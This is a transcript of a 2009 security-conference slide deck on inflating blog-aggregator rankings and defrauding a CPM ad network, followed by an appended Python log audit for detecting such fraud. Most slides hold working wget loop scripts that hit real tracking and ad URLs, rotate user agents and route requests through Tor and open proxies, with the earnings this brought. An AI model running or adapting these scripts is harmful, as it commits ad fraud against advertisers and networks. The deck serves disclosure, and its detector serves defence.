Smashing the stats for fun (and profit)

Shaun Dewberry
ZaCon 2009
http://www.zacon.org.za/Archives/2009/slides/

Transcript of "Smashing the stats for fun (and profit)"

  1. If you’re not famous, fake it.
  2. Shaun Dewberry
     • Unix/Security guy
     • Pretoria University (expelled for hacking!)
     • aka LowVoltage
  3. • Technorati.com
     • In SA:
         • Amatomu.com
         • Afrigator.co.za
     • Blogger pissing contest
  4. <!-- Start AMATOMU.COM code -->
     <img height='1' style='display:none' width='1' src='http://www.amatomu.com/log.php?cid=a433e87b0ebYe493dc055153ae332be0eeda46c' />
     <!-- End AMATOMU.COM code -->
  5. • Slow
     • Not really automated
     • Boring
     • Obvious
     • Traceable
  6. while [ 1 ] do
     wget http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
     done;
  7. • Don’t crash the server!
     • More random log entries

     #!/bin/sh
     set RANDOM=$$
     while [ 1 ]
     do
     let "delay = RANDOM % 30";  # Random 0 to 30 Second delay
     wget http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
     echo "Waiting $delay seconds"
     sleep $delay
     done;
  8. #!/bin/bash
     set RANDOM=$$
     while [ 1 ]
     do
     let "delay = RANDOM % 6";
     wget --delete-after http://afrigator.com/track/5013-none.gif
     sleep $delay;
     done;
  9. • wget User-Agent visible in server logs
     • All visits from same source IP address
  10. http://www.user-agent.org

     "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30
     Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
     Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
     Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1
     Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2
     Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0
     Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
     Mozilla/5.0 (Windows; U; Windows NT 5.1; en_US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.7
     Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19
  11. set RANDOM=$$
     while [ 1 ]
     do
     let "delay = RANDOM % 30"
     let "ua = RANDOM % `wc -l useragents.txt | awk '{print $1}'` + 1"
     uastring=`sed -n ${ua}p useragents.txt;`
     wget -q --delete-after --user-agent="$uastring" http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
     sleep $delay
     done;
  12. “Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location.”
     --torproject.org
  13. Diagram: wget, tsocks, tor, Aggregator
     • tsocks.sourceforge.net – Transparent Socks Proxy
  14. • #20 of 31 “top non-US startups to watch worldwide” by Business 2.0 (money.cnn.com)
     • Top 10 International Products for 2008 – ReadWriteWeb
     • Acquired by Naspers
     • Blah blah blah…
     • WTF? Security Anyone?
  15. • Invitations to launches
     • More traffic (ironic, isn’t it?)
     • Gadgets for review
     • Press accreditation
     • Fake a career as a social media expert
     • Social engineering hack
  16. • Ad network linking bloggers and advertisers
     • Revenue based on CPM (ad impressions)
     • CPM is horribly broken
  17. <!--/* Adgator.co.za Javascript Tag v2.6.3 */-->
     <script type='text/javascript'><!--//<![CDATA[
        var m3_u = (location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php');
        var m3_r = Math.floor(Math.random()*99999999999);
        if (!document.MAX_used) document.MAX_used = ',';
        document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
        document.write ("?zoneid=471");
        document.write ('&amp;cb=' + m3_r);
        if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
        document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
        document.write ("&amp;loc=" + escape(window.location));
        if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
        if (document.context) document.write ("&context=" + escape(document.context));
        if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
        document.write ("'></scr"+"ipt>");
     //]]>--></script><noscript><a href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422' border='0' alt='' /></a></noscript>

     Only care about ad image: http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f
  18. • No ads are served to wget??
     • OpenX Ad Server
     • If no cookie gets set, then no ad gets served
     • Certain User Agents are ignored
     • First ad served, but no ads thereafter (caching?)
     • Geo-targeting
  19. • Accept cookies (and turf them)
     • &cb=RANDOM parameter (Cache blocking)
     • tor nodes in ZA?
     • Zombie TelkomADSL botnet?
     • Open proxy servers – Proof of Concept
  20. let "delay = RANDOM % 40"  # Up to 40 second delay – let’s not be greedy
     let "prand = RANDOM % `wc -l proxies.txt | awk '{print $1}'` + 1"
     http_proxy=`sed -n ${prand}p proxies.txt;` # select a random proxy
     let "ua = RANDOM % `wc -l useragents.txt | awk '{print $1}'` + 1"
     uastring=`sed -n ${ua}p useragents.txt;` # random useragent
     let "rand = RANDOM % 999999999" # random integer for cache blocking
     if [ $http_proxy == "tsocks" ]; then  # 1/3rd of the time route through tor
         export http_proxy=
         /usr/bin/tsocks /usr/local/bin/wget --no-clobber --no-cache --max-redirect=0 --user-agent="$uastring" --referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
     else
         # otherwise request the ad straight through the SA proxy
         /usr/bin/wget -d --no-clobber --no-cache --user-agent="$uastring" --referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
     fi
  21. • 90 Ad impressions/day
     • Paid Ads Served: 224
     • Earnings: R11.09
  22. • 800 impressions/day (2 hour run)
     • 1677 Paid Ads Served
     • Earnings: R86.58
  23. • Automated auditing with complex analysis tools
     • Don’t use impression based costing models (duh!)
  24. • R8 per hour (conservative)
     • 24 hours
     • 30 days
     • R 5 760 per month
     • Mahala
     • The beer’s on me!
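
The "automated auditing" recommended on slide 23 can start from the signals the deck itself names: tool user agents visible in server logs, many visits from one source IP, and cookies that are never returned. The audit below is an added example, not part of the original slides; the log layout (combined format plus a trailing Cookie field), the thresholds, zone 12 and every sample line are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed ad-server log: combined format plus a trailing Cookie field.
# IPs come from documentation ranges; none of this is real traffic.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Oct/2009:10:00:01 +0200] "GET /delivery/avw.php?zoneid=471&cb=11 HTTP/1.0" 200 43 "http://blog.example/" "Mozilla/5.0 Firefox/3.0.4" "-"
192.0.2.10 - - [01/Oct/2009:10:00:19 +0200] "GET /delivery/avw.php?zoneid=471&cb=52 HTTP/1.0" 200 43 "http://blog.example/" "Mozilla/4.0 (compatible; MSIE 7.0)" "-"
192.0.2.10 - - [01/Oct/2009:10:00:40 +0200] "GET /delivery/avw.php?zoneid=471&cb=97 HTTP/1.0" 200 43 "http://blog.example/" "Mozilla/5.0 Chrome/0.4.154.18" "-"
192.0.2.11 - - [01/Oct/2009:10:01:02 +0200] "GET /delivery/avw.php?zoneid=471&cb=3 HTTP/1.0" 200 43 "-" "Wget/1.11.4" "-"
198.51.100.5 - - [01/Oct/2009:10:02:00 +0200] "GET /delivery/avw.php?zoneid=12&cb=8 HTTP/1.1" 200 43 "http://news.example/a" "Mozilla/5.0 Firefox/3.0.4" "-"
198.51.100.5 - - [01/Oct/2009:10:09:00 +0200] "GET /delivery/avw.php?zoneid=12&cb=9 HTTP/1.1" 200 43 "http://news.example/b" "Mozilla/5.0 Firefox/3.0.4" "viewer=c1"
198.51.100.5 - - [01/Oct/2009:10:15:00 +0200] "GET /delivery/avw.php?zoneid=12&cb=4 HTTP/1.1" 200 43 "http://news.example/c" "Mozilla/5.0 Firefox/3.0.4" "viewer=c1"
'''

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) [^"]*" '
                  r'\d+ \d+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"')
TOOL_UA = re.compile(r'wget|curl|libwww|python', re.I)

def audit(log_text, min_hits=3):
    """Return {zoneid: sorted flags} for zones whose impressions look scripted."""
    per_ip = defaultdict(list)   # (zone, ip) -> [(user agent, cookie), ...]
    flags = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        zone = re.search(r'[?&]zoneid=(\d+)', m['path']) if m else None
        if not zone:
            continue             # unparsable line or not an impression request
        zone = zone.group(1)
        if TOOL_UA.search(m['ua']):
            flags[zone].add('tool_user_agent')
        per_ip[(zone, m['ip'])].append((m['ua'], m['cookie']))
    for (zone, _ip), hits in per_ip.items():
        if len(hits) < min_hits:
            continue             # too few requests from this IP to judge
        if len({ua for ua, _ in hits}) >= min_hits:
            flags[zone].add('ua_rotation_single_ip')   # one IP, many browsers
        if all(cookie == '-' for _, cookie in hits):
            flags[zone].add('cookieless_repeat')       # cookie never returned
    return {z: sorted(f) for z, f in flags.items()}
```

Zones that come back flagged are candidates for withholding payment pending manual review; the per-IP checks stop helping once requests are spread across proxies, which is why the deck's second recommendation is to drop impression-based costing altogether.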